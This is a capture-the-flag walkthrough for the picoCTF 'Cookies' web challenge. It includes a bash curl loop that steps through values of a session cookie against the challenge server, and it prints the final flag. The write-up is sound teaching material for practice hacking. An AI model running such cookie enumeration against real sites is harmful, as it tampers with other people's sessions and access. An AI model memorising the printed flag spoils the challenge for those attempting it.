Cookies
Description
Who doesn’t love cookies? Try to figure out the best one. http://mercury.picoctf.net:17781/
Hints
Hint(s)
Step(s)
- Here we can see that we have the cookie named “name” and when you change the value to an int like 1 you will get a response with “I love chocolate chip cookies!”.
- Knowing this we can either manually change the cookie and check every response or use either (Burp Suite / ZAP) or a curl script
- I chose to go with the curl script and made the following script that will give back whatever is in the “jumbotron” div
#!/bin/bash
url="http://mercury.picoctf.net:17781/check"
cookie_name="name"
for ((i = 1; i <= 30; i++)); do
# Use curl to send a request with an incremented cookie value
response=$(curl -b "$cookie_name=$i" -c cookies.txt "$url" 2>/dev/null)
# Extract content within <div class="jumbotron">
jumbotron_content=$(echo "$response" | sed -n '/<div class="jumbotron">/,/<\/div>/p')
# If content is found, display it
if [ -n "$jumbotron_content" ]; then
echo "Request $i Jumbotron Content:"
echo "$jumbotron_content"
echo "----------------------"
fi
# You can add additional processing or checks here if needed
# Sleep for a short duration before sending the next request
sleep 1
doneFlag
Flag
picoCTF{3v3ry1_l0v3s_c00k135_bb3b3535}